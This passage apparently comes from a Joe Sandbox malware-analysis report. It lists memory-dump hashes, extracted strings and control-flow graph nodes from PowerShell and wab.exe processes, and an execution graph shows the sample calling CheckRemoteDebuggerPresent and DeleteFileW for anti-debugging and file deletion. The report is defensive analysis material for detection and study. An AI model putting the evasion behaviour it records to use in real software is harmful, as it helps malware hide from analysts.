                                  • Opcode ID: e7dd0a3f718e83927ca63b19d9007aa344d5ae5c7476207fc5ff2e8bce529031
                                  • Instruction ID: ff80674e6dad275d8a756285152b9657534c497f4150ccde078c3f4187a918d4
                                  • Opcode Fuzzy Hash: e7dd0a3f718e83927ca63b19d9007aa344d5ae5c7476207fc5ff2e8bce529031
                                  • Instruction Fuzzy Hash: 43316B74A046058FCB00CF58C984AEAFBB1FF49310F258299DA55AB791D332FD85CB90
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.878915276314.0000000007590000.00000040.00000800.00020000.00000000.sdmp, Offset: 07590000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_7590000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7865c6b90ff7e3007c2b7226bd7f78382135054b72e7232c42039a0ac20efd1e
                                  • Instruction ID: ced2275f0b036a40aa4ba5eda8dfb176e19a0549fcec21d91dbfea8bb4018eb3
                                  • Opcode Fuzzy Hash: 7865c6b90ff7e3007c2b7226bd7f78382135054b72e7232c42039a0ac20efd1e
                                  • Instruction Fuzzy Hash: 1831F4F5A00246EFDF548F258A407FABBE6FF81250F18807BD8059B251D739D994CBA1
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.878906395585.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_46b0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 14bd2d32e2274ed77656f8de1888034678d73c727583ae7f9a22c4154ac485d5
                                  • Instruction ID: 26e3dfc255f3acc7364695f2ba4655acaf1c7c269fb6a8db37066e419cbd1bea
                                  • Opcode Fuzzy Hash: 14bd2d32e2274ed77656f8de1888034678d73c727583ae7f9a22c4154ac485d5
                                  • Instruction Fuzzy Hash: 30312974A005099FCB14CF5CC5849AEFBB2FF88310B258698EA59AB755C732FD91CB90
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.878906395585.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_46b0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9425a6b72b17da711677a45eb2d6efb7750e2f91c70544e1445180a03b7915da
                                  • Instruction ID: 85cf089bd1ad34d61a5ea101113015f93fb865f71b1e174af7891bf58d220596
                                  • Opcode Fuzzy Hash: 9425a6b72b17da711677a45eb2d6efb7750e2f91c70544e1445180a03b7915da
                                  • Instruction Fuzzy Hash: 3E21F874A0060A9FCB10CF58C584AAAFBB1FF89310B158599E949AB752C735EC81CBA1
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.878906395585.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_46b0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 508db86e8d1ff6fff318fc8fcd33d4f76beba6ffd260ea7fc71ac6eef2633dc8
                                  • Instruction ID: 74203b9c06e32e826588c2d62286684e840f3772eb82792c33d332d5e2236fa2
                                  • Opcode Fuzzy Hash: 508db86e8d1ff6fff318fc8fcd33d4f76beba6ffd260ea7fc71ac6eef2633dc8
                                  • Instruction Fuzzy Hash: EB211674A006199FCB04CF89C9849AAFBB1FF89310B2581A9E949E7351D731FC81CFA0
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.878906395585.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_46b0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d9a3e6059684b9d93aaa13610762f07aabb9e3439721fad0cb432a880b4b1712
                                  • Instruction ID: 5a943a92c97d2f31f39044bf8523462a5a2d9d52474b058b1c536681f583401a
                                  • Opcode Fuzzy Hash: d9a3e6059684b9d93aaa13610762f07aabb9e3439721fad0cb432a880b4b1712
                                  • Instruction Fuzzy Hash: 00212974A042598FCB00DF58C5809AABBB1FF89310B158496E905EB352D735FD45CBA1
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.878906395585.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_46b0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: dacaa2ba83173c21e628774ce90ed31c643c213e7552ea74506b3e6347eeffff
                                  • Instruction ID: 24e14bedec64276acf64a96449d18736bb6f85a2a6896a1b928bb4b53b4106ee
                                  • Opcode Fuzzy Hash: dacaa2ba83173c21e628774ce90ed31c643c213e7552ea74506b3e6347eeffff
                                  • Instruction Fuzzy Hash: DB2150746005059FCB14CF58C594AAAF7B2FF89320F258698D65AAB794C736FC86CB80
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.878905588041.0000000002CED000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CED000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_2ced000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 445d855977864221f6912e7b53d61f3f08fc9227ae0ec7d330f6854394cc8095
                                  • Instruction ID: c634d4b595d5b912103ce5626a838dd0e1f5e7c0e8e3eaadb25864fcc5e27135
                                  • Opcode Fuzzy Hash: 445d855977864221f6912e7b53d61f3f08fc9227ae0ec7d330f6854394cc8095
                                  • Instruction Fuzzy Hash: 2901A271405380AAEB104E2ACAC4B67FF9CDF81364F1C851AED4B4B686C7799986C6F1
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.878906395585.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_46b0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d9ac5c7949ef5b419a7efec7a3b397f927d2793f5a1cb63dd5903aea3234badd
                                  • Instruction ID: dd18120615e485c8e3cb904411002a057b37773d0cc5dde9e992674cdd30f372
                                  • Opcode Fuzzy Hash: d9ac5c7949ef5b419a7efec7a3b397f927d2793f5a1cb63dd5903aea3234badd
                                  • Instruction Fuzzy Hash: 6F115775A005058FCB14CF48C5849EAF7B2FF88320B248698DA4AA7654D736FD95CB80
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.878905588041.0000000002CED000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CED000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_2ced000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5d422bf2a955fe803bde9d36fe74ddf42ab23db6e87dd1a48ecd4f4b10c4e40b
                                  • Instruction ID: 2a5b33eaaf9a0e2ae4b4c4a4c4490f239771c43c97f62f18070feba5e028cb1b
                                  • Opcode Fuzzy Hash: 5d422bf2a955fe803bde9d36fe74ddf42ab23db6e87dd1a48ecd4f4b10c4e40b
                                  • Instruction Fuzzy Hash: 49F0C271404340AEEB108E19C9C4B63FFACEB81634F18C55AED490B286C3799985CAB1
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.878906395585.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_46b0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 57d2f63ba2c825900e95abe8a0787f8095cc05e738c71c0f1b532b86a611f7a9
                                  • Instruction ID: 6440aeacb25279dc2efe0753579c42cb31960edbd72cc426cf5a5cec54cc7648
                                  • Opcode Fuzzy Hash: 57d2f63ba2c825900e95abe8a0787f8095cc05e738c71c0f1b532b86a611f7a9
                                  • Instruction Fuzzy Hash: E8F01235A00018AFCB159B8CD9808EDF772FF88324B248159E955B7255C733AD52CB51
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.878906395585.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_46b0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ae4af28efe42ebe6bab3f654d0328a5b0f9e68440ec9249ec2a57da9c93fd638
                                  • Instruction ID: 7b25e2ba2a5ab978bc8ffb225bacea22e675a169cec62e1694ba672a37ca3c29
                                  • Opcode Fuzzy Hash: ae4af28efe42ebe6bab3f654d0328a5b0f9e68440ec9249ec2a57da9c93fd638
                                  • Instruction Fuzzy Hash: 35F0B735A001059FCB15CB9CD994AEEF7B1FF88324F208159E515A72A1C736A852CB50
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.878906395585.00000000046B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_46b0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ebae6f7058c41c0197cf93c1ff0307d2b7debc1b19baecee183f14ee33fdadd8
                                  • Instruction ID: 8873d6f7170c77ac91cccfba6b629b20f303059f639c50aeca040146aa054fc5
                                  • Opcode Fuzzy Hash: ebae6f7058c41c0197cf93c1ff0307d2b7debc1b19baecee183f14ee33fdadd8
                                  • Instruction Fuzzy Hash: 40915871E003099FDF54DFA9C9857DEBBF6AF88304F148529E444AB394EB34A885CB81
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.878905588041.0000000002CED000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CED000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_2ced000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ff2f73aa6cde8e4c552a4c1cc6e0b1a3c319dad26be89c7b5684aa0985b5225b
                                  • Instruction ID: 3a11481443c67667bf9e26f5d58c6b9dd873b380d430bdc43c914440ab274475
                                  • Opcode Fuzzy Hash: ff2f73aa6cde8e4c552a4c1cc6e0b1a3c319dad26be89c7b5684aa0985b5225b
                                  • Instruction Fuzzy Hash: 76213575604240DFDF10CF18DEC0B26BBA9FBD4724F20C569D84B4B245CB3AD906C6A2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.878915276314.0000000007590000.00000040.00000800.00020000.00000000.sdmp, Offset: 07590000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_7590000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: (o7q$(o7q$4'7q$4'7q$4'7q$4'7q$4'7q$4'7q$4'7q$4'7q$tP7q$tP7q$tP7q$tP7q
                                  • API String ID: 0-3741282858
                                  • Opcode ID: 9850140fb63ced120cff92f3614b55f3cd9745e9ba3bee2cb8633d3c0f5548f8
                                  • Instruction ID: e43e4ee0239eaae7aac96fd9fe252e33eaec5a7154655febec68a7f8f68cced5
                                  • Opcode Fuzzy Hash: 9850140fb63ced120cff92f3614b55f3cd9745e9ba3bee2cb8633d3c0f5548f8
                                  • Instruction Fuzzy Hash: B002D5B5B0021ADFCF158F58C554AEEBBA2FF85314F14886AE9199B381CB36DC41CB91
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.878915276314.0000000007590000.00000040.00000800.00020000.00000000.sdmp, Offset: 07590000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_7590000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4'7q$4'7q$tP7q$tP7q$tP7q$tP7q$$7q$(=q$(=q$(=q$(=q
                                  • API String ID: 0-565116643
                                  • Opcode ID: f31aeaf6c06690b9c4b90ae69394406b76b63a55b04dbbb1455320a2eb5bfe11
                                  • Instruction ID: de8f3ce63eb22089e3ac993217c13cca006a629aaa2823aff414153b139771cf
                                  • Opcode Fuzzy Hash: f31aeaf6c06690b9c4b90ae69394406b76b63a55b04dbbb1455320a2eb5bfe11
                                  • Instruction Fuzzy Hash: 85A1D6B5B00216DFCF25CA69C6457EABBB2BB85314F24847BE8059B381DB36DC41C792
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.878915276314.0000000007590000.00000040.00000800.00020000.00000000.sdmp, Offset: 07590000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_7590000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: XR<q$XR<q$XR<q$tP7q$tP7q$$7q
                                  • API String ID: 0-160274573
                                  • Opcode ID: 810e23db738a20ddfad9b726f2f685320012860df0f1281cea59f95b57eeb360
                                  • Instruction ID: d3bfd0230e68f73c054f7ab08fa0eaba00153ff977b6ec00e816e19901c34b05
                                  • Opcode Fuzzy Hash: 810e23db738a20ddfad9b726f2f685320012860df0f1281cea59f95b57eeb360
                                  • Instruction Fuzzy Hash: 6861F3B6B001058FCF65CB688645AAABBA2BF85310F24C47AE9559B291CF36DC41C7A1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.878915276314.0000000007590000.00000040.00000800.00020000.00000000.sdmp, Offset: 07590000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_7590000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4'7q$4'7q$tP7q$tP7q$tP7q
                                  • API String ID: 0-789845615
                                  • Opcode ID: 9ff906b8ebddaecb4ca43af2fa0ef0ff74ba53da0240c894fa728b700e104dc2
                                  • Instruction ID: 67419be5324180f1048ed75b4edfe95fa506621835748bb88215c277789578ee
                                  • Opcode Fuzzy Hash: 9ff906b8ebddaecb4ca43af2fa0ef0ff74ba53da0240c894fa728b700e104dc2
                                  • Instruction Fuzzy Hash: 6EA15CB5B042ABDFCF118B68D5406EABBB2BFC6210F1884BBC556CF241DA35D840C7A1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.878915276314.0000000007590000.00000040.00000800.00020000.00000000.sdmp, Offset: 07590000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_7590000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4'7q$4'7q$$7q$$7q$$7q
                                  • API String ID: 0-2833837446
                                  • Opcode ID: 3a66550d14efd6719bc67c1fac0cf3ddfbc27cbc63e9d1815c09a95c197b28f8
                                  • Instruction ID: 942f764d923aae8872bc7af7ccd210673048bd12e6175dc1ce3e7aa88db5cc45
                                  • Opcode Fuzzy Hash: 3a66550d14efd6719bc67c1fac0cf3ddfbc27cbc63e9d1815c09a95c197b28f8
                                  • Instruction Fuzzy Hash: FC315ABAB0024ACFDF270A2495805F6B7A1FFC1215B38847BC9498B2C1FA3AC435C751
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.878919355754.0000000008B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08B00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_8b00000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: tP7q$$7q$$7q$$7q$$7q
                                  • API String ID: 0-3531082039
                                  • Opcode ID: ff4c64f2fc34af216236bf450e4e5cf5620733bfc6dd3c20a8939a3fd0d62d63
                                  • Instruction ID: b7ea33826f2fdd356f6357d6db9811e2d7238385e0a392c75fd367bd29c33615
                                  • Opcode Fuzzy Hash: ff4c64f2fc34af216236bf450e4e5cf5620733bfc6dd3c20a8939a3fd0d62d63
                                  • Instruction Fuzzy Hash: 8521D636A40214CFDB268E59C588976BBB4EF44612F1541EEE828AB391C731DD48CFA1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.878915276314.0000000007590000.00000040.00000800.00020000.00000000.sdmp, Offset: 07590000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_7590000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: (o7q$(o7q$(o7q$(o7q
                                  • API String ID: 0-2018135146
                                  • Opcode ID: 2cb5e1eda53bffa505f8b1027f7f038e6312460ad7c39abca3f3f624b5e9f8b0
                                  • Instruction ID: 25aa641ab639fc506040169c12344191aa91231ba4c3cb3f04e1e871812c55de
                                  • Opcode Fuzzy Hash: 2cb5e1eda53bffa505f8b1027f7f038e6312460ad7c39abca3f3f624b5e9f8b0
                                  • Instruction Fuzzy Hash: 05F100B5704345DFDF158F68C8407EABBB2BF81211F1884BBE9168B281DB36D845CB61
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.878919355754.0000000008B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08B00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_8b00000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: tP7q$tP7q$tP7q$tP7q
                                  • API String ID: 0-147015873
                                  • Opcode ID: 945af51e2934c3527909033a52c012bf29dead0207838d2f9c6b99ebe9fd1123
                                  • Instruction ID: 717613ea1c78165009782134ec1ffbe290d2d36d7e26c41701f63442a649f64f
                                  • Opcode Fuzzy Hash: 945af51e2934c3527909033a52c012bf29dead0207838d2f9c6b99ebe9fd1123
                                  • Instruction Fuzzy Hash: 4EC19334B00219DFCB258E5CC5546AA7FA2FF84356F1484ADE912AB6D1CB36EC41CFA1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.878915276314.0000000007590000.00000040.00000800.00020000.00000000.sdmp, Offset: 07590000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_7590000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4'7q$4'7q$tP7q$tP7q
                                  • API String ID: 0-3954423784
                                  • Opcode ID: 6d9e39c06543e68084e0584bf722c2e13b83d2ceeb934ce46dd61c00fa6f4b70
                                  • Instruction ID: c10d70eee23a489d36edc01917466bd25600e109e7c9b43b03d868b3c7f2a967
                                  • Opcode Fuzzy Hash: 6d9e39c06543e68084e0584bf722c2e13b83d2ceeb934ce46dd61c00fa6f4b70
                                  • Instruction Fuzzy Hash: 8AA171B5A0025ADFCF24CF48C584AE9FBB2FF45714F19886AE5099B291D336EC81CB41
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.878919355754.0000000008B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08B00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_8b00000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: tP7q$tP7q$tP7q$tP7q
                                  • API String ID: 0-147015873
                                  • Opcode ID: 28a4450680a4a7ae985a60dacaa1c342555fa80e352c6e1542ed6f8f68a82901
                                  • Instruction ID: 0da04c5ec69419462741307b569005f78f37cbc0f161fec77df7c1e2175474cb
                                  • Opcode Fuzzy Hash: 28a4450680a4a7ae985a60dacaa1c342555fa80e352c6e1542ed6f8f68a82901
                                  • Instruction Fuzzy Hash: A891C035B00204DFCB258A5DC658A6ABFE2EF88315F1884ADD8569B3D1CB36EC41CF91
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.878919355754.0000000008B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08B00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_8b00000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4'7q$4'7q$4'7q$4'7q
                                  • API String ID: 0-1495141006
                                  • Opcode ID: 067946e56eb1602243b9ecd1394c5da3ec53ca69ca9b59a04da05b99b83ae85d
                                  • Instruction ID: f1eb22ba8dfeb1f45dc1f916277b8b1ab4902b2378c4e58034cdf17933450b1c
                                  • Opcode Fuzzy Hash: 067946e56eb1602243b9ecd1394c5da3ec53ca69ca9b59a04da05b99b83ae85d
                                  • Instruction Fuzzy Hash: 04817C74A40219DFDB14DB24CE94BEABBB2AF85304F5085E8D4096F382CB35AD81CF91
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.878915276314.0000000007590000.00000040.00000800.00020000.00000000.sdmp, Offset: 07590000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_7590000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $7q$$7q$$7q$$7q
                                  • API String ID: 0-1116366105
                                  • Opcode ID: 7efa763db03f85e7b4f2b285639f652951a85ee3786d6d75bfcb07ff8075f10d
                                  • Instruction ID: 4e4e2a89c9a69d7473750fff3ace07ac0fb0010c1a759f00359446ab3f1729c1
                                  • Opcode Fuzzy Hash: 7efa763db03f85e7b4f2b285639f652951a85ee3786d6d75bfcb07ff8075f10d
                                  • Instruction Fuzzy Hash: C12107B9B10316A7DF24553A8850BA7779BFBC5615F24843BE94ADB381CE39C8418361
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.878915276314.0000000007590000.00000040.00000800.00020000.00000000.sdmp, Offset: 07590000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_7590000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4'7q$4'7q$$7q$$7q
                                  • API String ID: 0-65260992
                                  • Opcode ID: 4a87cd81b2b615cb2da54bca3a6ea1f6af4a2099503e700b8fdd1549c421435c
                                  • Instruction ID: 9233a9822c82cb4fc4b66425e4965a8033d5cc824b162918b4d96808a0e6457f
                                  • Opcode Fuzzy Hash: 4a87cd81b2b615cb2da54bca3a6ea1f6af4a2099503e700b8fdd1549c421435c
                                  • Instruction Fuzzy Hash: 3C01D664B196DB4FCB16023819601A87FB2AFC3558F2D00EBC082DB693C95A4C0A8B53

                                  Execution Graph

                                  Execution Coverage:9.3%
                                  Dynamic/Decrypted Code Coverage:100%
                                  Signature Coverage:50%
                                  Total number of Nodes:6
                                  Total number of Limit Nodes:0
                                  execution_graph 17021 22c95380 17022 22c953c4 CheckRemoteDebuggerPresent 17021->17022 17023 22c95406 17022->17023 17024 22c964a0 17025 22c964e6 DeleteFileW 17024->17025 17027 22c9651f 17025->17027

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 0 232c0040-232c0061 1 232c0063-232c0066 0->1 2 232c008c-232c008f 1->2 3 232c0068-232c0087 1->3 4 232c0095-232c00b4 2->4 5 232c0830-232c0832 2->5 3->2 13 232c00cd-232c00d7 4->13 14 232c00b6-232c00b9 4->14 6 232c0839-232c083c 5->6 7 232c0834 5->7 6->1 10 232c0842-232c084b 6->10 7->6 18 232c00dd-232c00ec 13->18 14->13 15 232c00bb-232c00cb 14->15 15->18 126 232c00ee call 232c0858 18->126 127 232c00ee call 232c0860 18->127 19 232c00f3-232c00f8 20 232c00fa-232c0100 19->20 21 232c0105-232c03e2 19->21 20->10 42 232c03e8-232c0497 21->42 43 232c0822-232c082f 21->43 52 232c0499-232c04be 42->52 53 232c04c0 42->53 55 232c04c9-232c04dc 52->55 53->55 57 232c0809-232c0815 55->57 58 232c04e2-232c0504 55->58 57->42 59 232c081b 57->59 58->57 61 232c050a-232c0514 58->61 59->43 61->57 62 232c051a-232c0525 61->62 62->57 63 232c052b-232c0601 62->63 75 232c060f-232c063f 63->75 76 232c0603-232c0605 63->76 80 232c064d-232c0659 75->80 81 232c0641-232c0643 75->81 76->75 82 232c06b9-232c06bd 80->82 83 232c065b-232c065f 80->83 81->80 84 232c07fa-232c0803 82->84 85 232c06c3-232c06ff 82->85 83->82 86 232c0661-232c068b 83->86 84->57 84->63 97 232c070d-232c071b 85->97 98 232c0701-232c0703 85->98 93 232c068d-232c068f 86->93 94 232c0699-232c06b6 86->94 93->94 94->82 100 232c071d-232c0728 97->100 101 232c0732-232c073d 97->101 98->97 100->101 104 232c072a 100->104 105 232c073f-232c0745 101->105 106 232c0755-232c0766 101->106 104->101 107 232c0749-232c074b 105->107 108 232c0747 105->108 110 232c077e-232c078a 106->110 111 232c0768-232c076e 106->111 107->106 108->106 115 232c078c-232c0792 110->115 116 232c07a2-232c07f3 110->116 112 232c0770 111->112 113 232c0772-232c0774 111->113 112->110 113->110 117 232c0794 115->117 118 232c0796-232c0798 115->118 116->84 117->116 118->116 126->19 127->19
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.882858910725.00000000232C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 232C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_232c0000_wab.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: h2*#$$7q$$7q$$7q$$7q$$7q$$7q
                                  • API String ID: 0-3020185119
                                  • Opcode ID: 0b61f17a8c19ab0bcc8b38cf8bbc877c653606abf27366dbef6feb8383d3d0bf
                                  • Instruction ID: b585649c9878dbaed0d0c0dccc4e6059ec69943faf6efa8f0dddf452488d3c95
                                  • Opcode Fuzzy Hash: 0b61f17a8c19ab0bcc8b38cf8bbc877c653606abf27366dbef6feb8383d3d0bf
                                  • Instruction Fuzzy Hash: C4324134E1075A8FCB14DB75C99459DF7B2BFD9300F61C7AAD40AA7254EB30AA85CB80

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1180 232cad28-232cad41 1181 232cad43-232cad46 1180->1181 1182 232cad4c-232cad4f 1181->1182 1183 232cafb3-232cafbc 1181->1183 1184 232cad51-232cad6d 1182->1184 1185 232cad72-232cad75 1182->1185 1186 232cad77-232cad80 1183->1186 1187 232cafc2-232cafcc 1183->1187 1184->1185 1185->1186 1188 232cad92-232cad95 1185->1188 1189 232cafcd-232cb003 1186->1189 1190 232cad86-232cad8d 1186->1190 1191 232cad9f-232cada2 1188->1191 1192 232cad97-232cad9c 1188->1192 1197 232cb005-232cb008 1189->1197 1190->1188 1195 232cada4 1191->1195 1196 232cadb2-232cadb4 1191->1196 1192->1191 1203 232cadaa-232cadad 1195->1203 1198 232cadbb-232cadbe 1196->1198 1199 232cadb6 1196->1199 1201 232cb028-232cb02b 1197->1201 1202 232cb00a-232cb023 1197->1202 1198->1181 1204 232cadc0-232cae74 1198->1204 1199->1198 1205 232cb02d-232cb053 1201->1205 1206 232cb058-232cb05b 1201->1206 1202->1201 1203->1196 1317 232cae7a-232cae85 1204->1317 1318 232caf71-232caf95 1204->1318 1205->1206 1207 232cb05d-232cb063 1206->1207 1208 232cb068-232cb06b 1206->1208 1207->1208 1211 232cb07c-232cb07f 1208->1211 1212 232cb06d-232cb077 1208->1212 1215 232cb08c-232cb08f 1211->1215 1216 232cb081-232cb087 1211->1216 1212->1211 1220 232cb097-232cb09a 1215->1220 1221 232cb091-232cb092 1215->1221 1216->1215 1223 232cb09c-232cb0ae 1220->1223 1224 232cb0b3-232cb0b6 1220->1224 1221->1220 1223->1224 1226 232cb0b8-232cb0bb 1224->1226 1227 232cb0ca-232cb0cd 1224->1227 1230 232cb201-232cb236 1226->1230 1231 232cb0c1-232cb0c5 1226->1231 1232 232cb0cf-232cb0d8 1227->1232 1233 232cb0ea-232cb0ed 1227->1233 1244 232cb238-232cb23b 1230->1244 1231->1227 1232->1230 1234 232cb0de-232cb0e5 1232->1234 1235 232cb0ef-232cb0fe 1233->1235 1236 232cb105-232cb108 1233->1236 1234->1233 1249 232cb16c-232cb16f 1235->1249 1250 232cb100 1235->1250 1239 232cb10a-232cb125 1236->1239 1240 232cb130-232cb133 1236->1240 1239->1221 1265 232cb12b 1239->1265 1241 232cb13a-232cb13d 1240->1241 1242 232cb135-232cb137 1240->1242 1246 232cb13f-232cb162 1241->1246 1247 232cb167-232cb16a 1241->1247 1242->1241 1251 232cb23d-232cb259 1244->1251 1252 232cb25e-232cb261 1244->1252 1246->1247 1247->1249 1253 232cb174-232cb177 1247->1253 1249->1253 1250->1236 1251->1252 1254 232cb26e-232cb271 1252->1254 1255 232cb263-232cb26d 1252->1255 1256 232cb179-232cb17c 1253->1256 1257 232cb187-232cb18a 1253->1257 1259 232cb288-232cb28b 1254->1259 1260 232cb273-232cb281 1254->1260 1256->1226 1264 232cb182 1256->1264 1266 232cb18c-232cb191 1257->1266 1267 232cb194-232cb197 1257->1267 1268 232cb28d-232cb2a6 1259->1268 1269 232cb2ab-232cb2ad 1259->1269 1278 232cb2bd-232cb2ea 1260->1278 1279 232cb283 1260->1279 1264->1257 1265->1240 1266->1267 1273 232cb199-232cb1b5 1267->1273 1274 232cb1ba-232cb1bd 1267->1274 1268->1269 1271 232cb2af 1269->1271 1272 232cb2b4-232cb2b7 1269->1272 1271->1272 1272->1244 1272->1278 1273->1274 1280 232cb1bf-232cb1c2 1274->1280 1281 232cb1c9-232cb1d2 1274->1281 1301 232cb47a-232cb47f 1278->1301 1302 232cb2f0-232cb312 1278->1302 1279->1259 1280->1256 1284 232cb1c4-232cb1c7 1280->1284 1281->1232 1287 232cb1d8 1281->1287 1284->1281 1288 232cb1dd-232cb1df 1284->1288 1287->1288 